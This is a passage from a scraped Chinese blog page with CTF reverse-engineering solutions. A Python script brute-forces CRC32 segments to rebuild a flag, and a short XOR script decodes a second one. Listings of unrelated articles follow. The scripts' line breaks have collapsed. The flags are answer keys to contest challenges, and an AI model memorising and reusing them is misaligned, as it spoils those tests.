targets = ["d1f4eb9a",  # First 4 characters"15d54739",  # Next 1 character"540bbb08",  # Next 4 characters"3fcbd242",  # Next 2 characters"2479c623",  # Next 4 characters"fcb6e20c"   # Last 1 character
]# Define the character set (visible ASCII characters)
charset = string.ascii_letters + string.digits + string.punctuation + ' '# Define the lengths of segments we need to match
lengths = [4, 1, 4, 2, 4, 1]# Helper function to try all combinations of a given length
def find_matching_segment(target_crc, length, charset):for candidate in itertools.product(charset, repeat=length):candidate_str = ''.join(candidate)if compute_crc32(candidate_str) == target_crc:return candidate_strreturn None# Brute force each segment
segments = []
for target, length in zip(targets, lengths):segment = find_matching_segment(target, length, charset)if segment:segments.append(segment)print(f"Found segment for target {target}: {segment}")else:print(f"No matching segment found for target {target}")break# Combine all segments if all were found
if len(segments) == len(targets):final_input = ''.join(segments)print(f"Found full input: {final_input}")
else:print("Failed to find a valid input string for all segments.")
flag{ezrebyzhsh}

【REVERSE】c2

image-20240601222011941

^0xa -3

脚本

str='hefklijcda'
flag=''
for y in range(len(str)):flag+=chr((ord(str[y])+3)^0xa)print(flag)
flag{abcdefglmn}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/21382.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

R语言 | 安装ggpubr R包时编译语句中出现 WARNING: ignoring environment value of R_HOME 而报错

在安装 ggpubr 时&#xff0c;出现报错。 1. 环境介绍 系统&#xff1a;CentOS7.9 $ R --version R version 4.3.2 (2023-10-31) – “Eye Holes” $ gcc --version gcc (GCC) 12.3.0 2. 缺少cmake $ sudo yum install cmake3> system("/usr/bin/cmake3 --versio…

法国工程师数电练习题——有限状态机

1. 有限状态机 1.1 问题背景描述 给定的有限状态机由其状态图表示&#xff0c;具有两个输入E1和E2以及一个输出S。状态机为下图。请为以下输入序列绘制这个Moore机的时序图&#xff1a; 1) 在t50纳秒时&#xff0c;E1E211 2) 在t150纳秒时&#xff0c;E1E200 …

Redis教程(十九):Redis的Redisson布隆过滤器

传送门&#xff1a;Redis教程汇总篇&#xff0c;让你从入门到精通 布隆过滤器 布隆过滤器&#xff08;Bloom Filter&#xff09;是一种空间效率极高的概率型数据结构&#xff0c;用于快速检测一个元素是否存在于一个集合中。由于其独特的特性&#xff0c;布隆过滤器可以在需要…

1.盒模型及其应用(溢出、外边距塌陷)

一、盒模型 盒模型详解-CSDN博客 CSS学习笔记3&#xff1a;CSS三大特性、盒子模型-CSDN博客 1.盒模型组成 &#xff08;1&#xff09;padding padding和border都会撑大盒子&#xff0c;margin不会. 如果没有指定盒子的width/height&#xff0c;那么padding不会撑大盒子。 &am…

Nvidia Jetson/Orin +FPGA+AI大算力边缘计算盒子:公路智能巡检解决方案

项目背景 中国公路网络庞大&#xff0c;总里程超过535万公里&#xff0c;高速公路里程位居世界前列。面对基础设施存量的不断增长&#xff0c;公路养护管理已迈入“建管养并重”的新时代。随着养护支出的逐年攀升&#xff0c;如何提升养护效率、降低管理成本&#xff0c;成为亟…

YOLOv10:实时端到端目标检测的新突破

目标检测作为计算机视觉领域的一个核心问题&#xff0c;其关键在于能够在图像中准确识别并定位对象。随着深度学习技术的发展&#xff0c;基于深度神经网络的目标检测方法不断涌现&#xff0c;其中YOLO&#xff08;You Only Look Once&#xff09;系列算法以其优异的实时性和准…

推荐几个开源的c#的工作流引擎组件

以下是一个.NET Core领域可以推荐使用的流程引擎的表格&#xff1a; 名称 生产厂家 下载地址 支持二开 独立部署 ccflow 济南驰骋信息技术有限公司 https://gitee.com/opencc 是 是 Elsa Elsa Workflows GitHub - elsa-workflows/elsa-core: A .NET workflows li…

C++类和对象下篇

&#x1f407; &#x1f525;博客主页&#xff1a; 云曦 &#x1f4cb;系列专栏&#xff1a;[C] &#x1f4a8;路漫漫其修远兮 吾将而求索 &#x1f49b; 感谢大家&#x1f44d;点赞 &#x1f60b;关注&#x1f4dd;评论 文章目录 &#x1f4d4;1、再谈构造函数&#x1f4f0;…

使用 el-autocomplete 实现远程搜索功能

在现代Web应用中&#xff0c;提供高效且用户友好的搜索体验至关重要。Element UI&#xff08;一个为Vue.js设计的桌面端UI框架&#xff09;中的el-autocomplete组件正是为了满足这一需求而设计的&#xff0c;它能够实现自动补全与异步搜索功能。本文将通过一个示例来介绍如何使…

【C++】类和对象——构造和析构函数

目录 前言类的六个默认构造函数构造函数1.构造函数的概念2.构造函数的特性 初始化列表1.构造函数整体赋值2.初始化列表 析构函数1.析构函数的概念2.析构函数的特性 前言 类和对象相关博客&#xff1a;【C】类和对象   我们前面一个内容已经讲了关于类好对象的初步的一些知识&…

Python量化交易学习——Part5:通过相关系数选择对收益率影响比重大的因子(1)

上一节中我们学习了如何通过单因子策略进行股票交易,在实际的股市中,因子(也就是指标)数量往往非常之多,比如市盈率/市净率/净资产收益率等,在使用这些因子的过程中,我们会发现有的因子与收益率为正相关,有的因子为负相关,而有些因子几乎完全无关。 所以我们可以通过计…

k8s笔记——kubernetes中的三种IP

kubernetes概念 Master&#xff1a;集群控制节点&#xff0c;每个集群需要至少一个master节点负责集群的管控 Node&#xff1a;工作负载节点&#xff0c;由master分配容器到这些node工作节点上&#xff0c;然后node节点上的docker负责容器的运行 Pod&#xff1a;kubernetes的…

JS-10-es6常用知识-对象扩展

目录 1 Object.assign&#xff1a;实现拷贝继承 2 扩展运算符(...) 1&#xff09;介绍 2&#xff09;数组中的扩展运算符 3&#xff09;对象中的扩展运算符 1 Object.assign&#xff1a;实现拷贝继承 1&#xff09;目的&#xff1a;Object.assign()方法在 JavaScript 中被…

Java线程中sleep()和wait()有什么区别

在Java线程中&#xff0c;sleep()和wait()是两个经常被提及但功能和使用场景完全不同的方法。以下是它们之间的主要区别&#xff1a; 所属类和用途&#xff1a; sleep() 是 Thread 类的一个静态方法&#xff0c;它用于使当前线程&#xff08;即调用 sleep() 的线程&#xff0…

C++访问越界

常见场景 访问数组元素越界vector容器访问等 vector<int>;vec<2>&#xff1b;字符串访问越界string str;str[2];array数组访问越界字符串处理&#xff0c;没有添加’\0’字符&#xff0c;导致访问字符串的时候越界了&#xff1b;使用类型强转&#xff0c;让一个大…

Flutter开发效率提升1000%,Flutter Quick教程之定义构造参数和State成员变量

一个Flutter页面&#xff0c;可以定义页面构造参数和State成员变量。所谓页面构造参数&#xff0c;就是当前页面构造函数里面的参数。 比如下面代码&#xff0c;a就是构造参数&#xff0c;a1就是State成员变量。 class Testpage extends StatefulWidget {String a;const Test…

docker学习--docker容器镜像常用命令大全(简)

文章目录 一、镜像命令二、容器管理命令 一、镜像命令 docker search #搜索镜像 docker pull/push #下载/上传镜像 docker images #查看所有本地主机上的镜像可以使用docker image ls代替 docker tag #源镜像名 新镜像名 docker rmi #删除镜像 docker image prune #移除没有标签…

Python的文件管理

读取文件 首先我们可以先创建一个工程项目&#xff0c;如图所示&#xff1a; 打开我们名为1.读取文件.py的python文件&#xff0c;然后我们可以写下读取Python文件的代码&#xff0c;代码如下&#xff1a; f open("1.txt", "r") print(f.read()) f.clos…

【PB案例学习笔记】-14使用次数和日期限制

写在前面 这是PB案例学习笔记系列文章的第14篇&#xff0c;该系列文章适合具有一定PB基础的读者。 通过一个个由浅入深的编程实战案例学习&#xff0c;提高编程技巧&#xff0c;以保证小伙伴们能应付公司的各种开发需求。 文章中设计到的源码&#xff0c;小凡都上传到了gite…

基于OLED菜单显示

菜单一般需要四个按键&#xff0c;上下移动光标&#xff0c;进入菜单&#xff0c;退出菜单 1.按键部分 按键头文件 #ifndef __KEYdriver_H #define __KEYdriver_H #include "sys.h" #include "stdbool.h" /*用户定义的宏开始*/ #define CursorUp PCi…